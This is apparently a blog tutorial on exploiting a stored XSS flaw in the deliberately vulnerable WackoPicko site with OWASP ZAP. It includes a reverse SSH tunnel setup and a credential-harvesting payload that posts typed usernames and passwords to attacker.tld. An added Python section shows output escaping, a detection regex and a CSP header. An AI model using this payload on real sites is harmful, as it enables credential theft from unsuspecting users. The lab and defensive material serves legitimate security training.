Exploiting Cross-Site Scripting to Capture Passwords With OWASP ZAP

WackoPicko is a deliberately vulnerable website that includes common flaws, among them a stored XSS vulnerability in its blog comment (guestbook) feature. Using OWASP ZAP’s callback listener, this vulnerability can be exploited to capture a victim’s username and password and subsequently gain access to their account.

  • Access your remote C2 server via SSH and edit /etc/ssh/sshd_config so that the following options are enabled:
AllowTcpForwarding yes
GatewayPorts yes
  • Restart sshd with systemd:
sudo systemctl restart ssh
  • From your attacking machine, open a reverse SSH tunnel to the remote server so that anything hitting port 38193 on the server is forwarded to the attacker’s instance of ZAP listening on port 38193 locally:
ssh -N -R 38193:localhost:38193 user@attacker.tld
  • Going back to ZAP, open the Options menu, go to “Callback Address” and set the callback address so that ZAP is reachable through the tunnelled port (attacker.tld:38193 in this walkthrough).

  • Go back to the Guestbook and submit the following payload in a blog comment, inserting your callback Test URL:
<input name=username id=username>
<input type=password name=password onchange="if(this.value.length)fetch('http://attacker.tld:38193/ZapTest',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">
  • This payload makes anyone who views the comment and fills in the injected fields issue a POST request to http://attacker.tld:38193/ZapTest containing the username and password they typed.
  • Go back to the Callbacks tab in ZAP (you may need to add it to the interface first).
  • Take a note of the value of the victim’s username and password in the POST body.
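As an added example (not code from the original post or from WackoPicko), the following contrasts the guestbook bug with the fix that closes it, and adds a check that flags stored comments shaped like the payload above. The render_comment_* functions are hypothetical stand-ins for the application's own comment rendering; the sample comments are constructed here.

```python
import html
import re

# Constructed sample: the credential-harvesting comment from the walkthrough.
PAYLOAD = (
    '<input name=username id=username>\n'
    '<input type=password name=password onchange="if(this.value.length)'
    "fetch('http://attacker.tld:38193/ZapTest',{method:'POST',mode:'no-cors',"
    "body:username.value+':'+this.value});\">"
)

def render_comment_vulnerable(comment: str) -> str:
    """Mirrors the stored-XSS bug: comment text is dropped into the page as-is,
    so the injected <input> elements and their onchange handler become live markup."""
    return f'<div class="comment">{comment}</div>'

def render_comment_fixed(comment: str) -> str:
    """Output-encodes the comment so the browser treats it as text, not markup.
    '<', '>', '&' and quotes are escaped; the payload is displayed, never executed."""
    return f'<div class="comment">{html.escape(comment, quote=True)}</div>'

# Detection: an inline event-handler attribute (onchange=, onerror=, ...) whose body
# calls fetch()/XMLHttpRequest/sendBeacon with an absolute http(s) URL, i.e. the shape
# of a browser-side exfiltration payload. Run over stored comments or HTTP responses.
EXFIL_HANDLER = re.compile(
    r"""\son[a-z]+\s*=\s*["']?[^"'>]*?(?:fetch|XMLHttpRequest|sendBeacon)\s*\(?\s*["']?https?://""",
    re.IGNORECASE | re.DOTALL,
)

def looks_like_exfil_xss(comment: str) -> bool:
    """True when the comment contains an event handler that posts data off-site."""
    return EXFIL_HANDLER.search(comment) is not None

# Defence in depth: with this response header the browser refuses the fetch() to
# attacker.tld even if the markup were rendered, because connect-src only allows
# the page's own origin.
CSP_HEADER = "Content-Security-Policy: default-src 'self'; connect-src 'self'"

def review_comment(comment: str) -> dict:
    """Summarises how a stored comment fares under the vulnerable and fixed renderers."""
    return {
        "flagged": looks_like_exfil_xss(comment),
        "live_markup_when_vulnerable": "<input" in render_comment_vulnerable(comment),
        "live_markup_when_fixed": "<input" in render_comment_fixed(comment),
    }
```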

Chaotic Solutions

In this brief piece, you'll learn about using OWASP ZAP to obtain passwords through XSS.

By Anthony Cozamanis, 2023-05-13